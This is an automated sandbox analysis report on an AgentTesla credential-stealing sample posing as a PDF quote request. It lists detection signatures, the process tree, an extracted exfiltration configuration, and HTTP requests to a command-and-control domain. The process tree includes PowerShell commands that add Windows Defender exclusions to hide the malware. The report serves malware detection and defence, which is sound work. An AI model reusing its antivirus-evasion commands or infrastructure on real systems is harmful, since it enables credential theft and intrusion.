Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report RFQ - REF 208056-pdf.exe

Overview

General Information

Sample Name:RFQ - REF 208056-pdf.exe
Analysis ID:358398
MD5:c1b250f45de606ef95af9961496402a0
SHA1:a222da21dbd932d64f9cad12b46c068ac7360f72
SHA256:cdb8cf995f8287a1f64cd035c4e34e047e23a3218dbf50b0fcf321ecd464094e
Tags:exesigned
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Tries to delay execution (extensive OutputDebugStringW loop)
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • RFQ - REF 208056-pdf.exe (PID: 6556 cmdline: 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' MD5: C1B250F45DE606EF95AF9961496402A0)
    • powershell.exe (PID: 5688 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 5504 cmdline: 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5716 cmdline: 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6736 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1044 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6220 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • RFQ - REF 208056-pdf.exe (PID: 5228 cmdline: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe MD5: C1B250F45DE606EF95AF9961496402A0)
    • WerFault.exe (PID: 6032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2200 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7040 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7108 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7156 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6064 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 7008 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • explorer.exe (PID: 2084 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6816 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 1020 cmdline: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' MD5: C1B250F45DE606EF95AF9961496402A0)
  • explorer.exe (PID: 6400 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 2160 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 4820 cmdline: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' MD5: C1B250F45DE606EF95AF9961496402A0)
  • svchost.exe (PID: 5232 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5408 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5828 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6556 -ip 6556 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "FTP Info": "directortopcoba@top-co.babrSet=M{CAdetop-co.ba"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001B.00000002.497563880.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000001B.00000002.519847077.0000000002C91000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000001B.00000002.519847077.0000000002C91000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000019.00000002.544137822.0000000003D04000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              16.2.svchost.exe.47b10f0.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                16.2.svchost.exe.47b10f0.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.RFQ - REF 208056-pdf.exe.3d586d0.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.RFQ - REF 208056-pdf.exe.3b23dd8.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Svchost ProcessShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6816, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , ProcessId: 1020
                      Sigma detected: System File Execution Location AnomalyShow sources
                      Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6816, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , ProcessId: 1020
                      Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                      Source: Process startedAuthor: vburov: Data: Command: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6816, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' , ProcessId: 1020

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 16.2.svchost.exe.47b10f0.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "FTP Info": "directortopcoba@top-co.babrSet=M{CAdetop-co.ba"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: coroloboxorozor.comVirustotal: Detection: 15%Perma Link
                      Source: http://coroloboxorozor.comVirustotal: Detection: 15%Perma Link
                      Source: http://coroloboxorozor.com/base/4FDB764474638ADF12639B4DA858CE81.htmlVirustotal: Detection: 15%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeReversingLabs: Detection: 31%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: RFQ - REF 208056-pdf.exeVirustotal: Detection: 18%Perma Link
                      Source: RFQ - REF 208056-pdf.exeReversingLabs: Detection: 31%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeJoe Sandbox ML: detected
                      Machine Learning detection for sampleShow sources
                      Source: RFQ - REF 208056-pdf.exeJoe Sandbox ML: detected
                      Source: 16.0.svchost.exe.d60000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 16.2.svchost.exe.d60000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 0.2.RFQ - REF 208056-pdf.exe.50000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 0.0.RFQ - REF 208056-pdf.exe.50000.0.unpackAvira: Label: TR/Dropper.Gen

                      Compliance:

                      barindex
                      Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                      Source: RFQ - REF 208056-pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, AdvancedRun.exe, 0000000B.00000000.311587089.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000000.329692687.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\Desktop\RFQ - REF 208056-pdf.PDB source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
                      Source: Binary string: OnpeiVisualBasic.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
                      Source: Binary string: O.pdb3X source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbA source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbn source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: hhRFQ - REF 208056-pdf.PDB source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
                      Source: Binary string: System.Management.Automation.pdb-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer3215EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC9F596836F97C8F7479F source: powershell.exe, 00000011.00000002.548053273.0000000008392000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb^ source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: global trafficHTTP traffic detected: GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1Host: coroloboxorozor.com
                      Source: Joe Sandbox ViewIP Address: 172.67.172.17 172.67.172.17
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: global trafficHTTP traffic detected: GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1Host: coroloboxorozor.com
                      Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.403215923.0000000002581000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.524567158.00000000034C1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.403215923.0000000002581000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.524567158.00000000034C1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/4FDB764474638ADF12639B4DA858CE81.html
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.403215923.0000000002581000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.524567158.00000000034C1000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/7DD0ECB3FED3970A09258155874027F0.html
                      Source: powershell.exe, 00000011.00000002.518282012.00000000035B4000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000011.00000002.551437427.0000000009B51000.00000004.00000001.sdmpString found in binary or memory: http://crl.m
                      Source: powershell.exe, 00000011.00000002.551437427.0000000009B51000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.co
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: svchost.exe, 00000002.00000002.529372868.000001EAA1C00000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: svchost.exe, 00000002.00000002.529372868.000001EAA1C00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: svchost.exe, 00000002.00000002.529372868.000001EAA1C00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000011.00000002.524764005.0000000005201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: svchost.exe, 00000002.00000002.532241708.000001EAA1F60000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.403215923.0000000002581000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.539506519.0000000005161000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.524567158.00000000034C1000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.524025636.00000000050C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000011.00000002.524764005.0000000005201000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: svchost.exe, 00000005.00000002.307256810.00000243FF013000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: powershell.exe, 00000011.00000002.547914635.0000000008310000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.coaHp
                      Source: AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000000.329692687.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: svchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
                      Source: svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000005.00000003.307021748.00000243FF04A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000005.00000003.307003492.00000243FF04D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000005.00000002.307267041.00000243FF029000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000005.00000003.307049363.00000243FF042000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000005.00000003.307049363.00000243FF042000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000005.00000003.307034624.00000243FF041000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000005.00000003.307021748.00000243FF04A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000005.00000002.307307178.00000243FF05D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000005.00000002.307307178.00000243FF05D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000005.00000003.307003492.00000243FF04D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
